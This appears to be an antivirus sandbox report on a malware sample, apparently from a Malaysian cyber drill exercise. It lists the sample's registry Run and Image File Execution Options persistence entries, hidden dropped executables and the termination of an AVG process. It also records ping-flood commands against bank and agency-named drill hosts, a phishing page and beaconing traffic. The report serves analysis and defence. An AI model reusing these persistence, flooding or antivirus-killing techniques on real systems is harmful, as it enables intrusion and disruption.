Technical Information
To ensure autorun and distribution:
Modifies the following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'hn7e6068' = '<SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\hn7e6068.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe] 'Debugger' = '<SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\hn7e6068.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'hn7e6068' = '<SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe] 'Debugger' = '<SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\services.exe'
Malicious functions:
Creates and executes the following:
- <SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\hn7e6068.exe
Executes the following:
- <SYSTEM32>\ping.exe mbb.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe sc.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe mampu.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe muamalat.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe bursa.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe cimb.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe mcmc.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe mosti.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe celcom.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe st.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe petronas.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe tnb.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe moh.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe kpj.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe span.cyberdrill.my -l 65500 -n 5
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://in#####d.cyberdrill.my/mailer/email.php?ta#####
- <SYSTEM32>\ping.exe rhb.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe mas.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe syabas.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe sajholding.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe bnm.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe hselayang.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe pbapp.cyberdrill.my -l 65500 -n 5
- <SYSTEM32>\ping.exe indahwater.cyberdrill.my -l 65500 -n 5
Terminates or attempts to terminate
the following user processes:
- AVGCC32.EXE
Hides the following processes:
- <Full path to virus>
- <SYSTEM32>\ping.exe
Modifies file system :
Creates the following files:
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\netdhcp.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\xmayabank[1].html
- C:\xampp\htdocs\myphish\xmayabank.html
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\mirror.exe
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\scservice.exe
- <SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\hn7e6068.exe
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\servicess.exe
Sets the 'hidden' attribute to the following files:
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\mirror.exe
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\netdhcp.exe
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\servicess.exe
- <SYSTEM32>\YXVZYOXVSOUW[YYTTOTUZ[Z\scservice.exe
- <SYSTEM32>\LKIMLBKIFBHJ[LLGGBGHM[M\hn7e6068.exe
Network activity:
Connects to:
- 'localhost':1037
- 'cn#.##berdrill.my':80
TCP:
HTTP GET requests:
- cn#.##berdrill.my/phish/images/arrow.png
- cn#.##berdrill.my/phish/xmayabank.html
- cn#.##berdrill.my/gerudi/update.txt?ho###########################
UDP:
- DNS ASK bu###.cyberdrill.my
- DNS ASK ci##.#yberdrill.my
- DNS ASK mu#####t.cyberdrill.my
- DNS ASK sa######ng.cyberdrill.my
- DNS ASK bn#.##berdrill.my
- DNS ASK st.###erdrill.my
- DNS ASK pe#####s.cyberdrill.my
- DNS ASK ma###.cyberdrill.my
- DNS ASK mb#.##berdrill.my
- DNS ASK sc.###erdrill.my
- DNS ASK mo#.##berdrill.my
- DNS ASK kp#.##berdrill.my
- DNS ASK rh#.##berdrill.my
- DNS ASK cn#.##berdrill.my
- DNS ASK ma#.##berdrill.my
- DNS ASK in######er.cyberdrill.my
- DNS ASK sy####.cyberdrill.my
- DNS ASK pb###.cyberdrill.my
- DNS ASK sp##.#yberdrill.my
- DNS ASK hs#####ng.cyberdrill.my
Miscellaneous:
Searches for the following windows:
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''
